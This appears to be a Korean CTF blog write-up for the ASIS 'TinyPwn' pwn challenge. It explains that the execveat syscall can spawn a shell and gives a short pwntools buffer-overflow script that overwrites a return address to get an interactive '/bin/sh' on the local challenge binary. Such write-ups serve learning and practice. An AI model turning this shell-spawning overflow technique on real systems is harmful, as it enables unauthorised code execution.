x64 systemcall 중 execveat이란 게 있어서 execve말고도 execveat으로도 쉘을 띄울 수 있다.....
이걸 몰라서 asis때 개삽질했다.... 이것만 알면 엄청 쉬운 문젠데.....
이런식으로 하면 쉘이 따진다....
꼭 기억해놔야겠다...
asis Tinypwn문제가 바로 이거가지고 rop하는 문제였다.
payload
# usr/bin/env python # ryuuu from pwn import * import sys s = process('./TinyPwn') #s = process(["strace","-i","./TinyPwn"]) print util.proc.pidof(s) pause() payload = '/bin/sh\x00'.ljust(0x128,'A') payload += p64(0x4000ed) payload = payload.ljust(0x141,'A') s.sendline(payload) s.interactive()
'pwnable > ctf' 카테고리의 다른 글
[write-up] 2018 SCTF - CowBoy (1) | 2018.07.14 |
---|---|
[write-up] 2017 defcon CTF - smashme (3) | 2018.05.09 |
[write-up] 2018 ASIS CTF - Cat (0) | 2018.05.02 |
[write-up] 2018 codegate - Super Marimo (0) | 2018.03.08 |
[write-up] 2018 codegate - BaskinRobins31 (0) | 2018.02.06 |
댓글